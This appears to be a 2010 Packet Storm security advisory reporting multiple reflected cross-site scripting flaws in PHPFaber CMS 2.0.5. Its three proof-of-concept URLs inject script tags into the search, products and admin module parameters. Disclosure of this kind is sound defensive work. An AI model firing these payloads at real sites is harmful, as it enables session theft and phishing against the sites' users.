PHPFaber CMS 2.0.5 Cross Site Scripting

2010-07-08T00:00:00
ID PACKETSTORM:91628
Type packetstorm
Reporter prodigy
Modified 2010-07-08T00:00:00

Description

                                        
                                            `############################  
############################  
  
# Author: prodigy  
# Date found: 4/07/2010  
  
############################  
  
###############################  
  
# Software: PHPFaber Content Management System  
# Vendor: www.phpfaber.com  
# version: 2.0.5  
# Vulnerability founded: Multiple XSS Vulnerabilities  
# Risk: Medium  
# Impact: Malicious attackers can run javascript code into the page to perform phising attacks and cookie stealing.  
  
  
################################  
  
##################################  
PoC   
##################################  
  
http://server/cms/module.php?mod=Search&query=%3Cscript%3Ealert%280%29%3C/script%3E&stype=OR&go=++++Go!++++  
  
http://server/cms/module.php/Products/%22%3E%3Cscript%3Ealert%280%29%3C/script%3E  
  
http://server/cms/cms_admin/index.php?mod=%3Cscript%3Ealert%280%29%3C/script%3E&action=setup  
  
  
And more...  
################################  
  
Greetz: thanks myself for find the bug  
  
################################  
  
  
  
  
  
`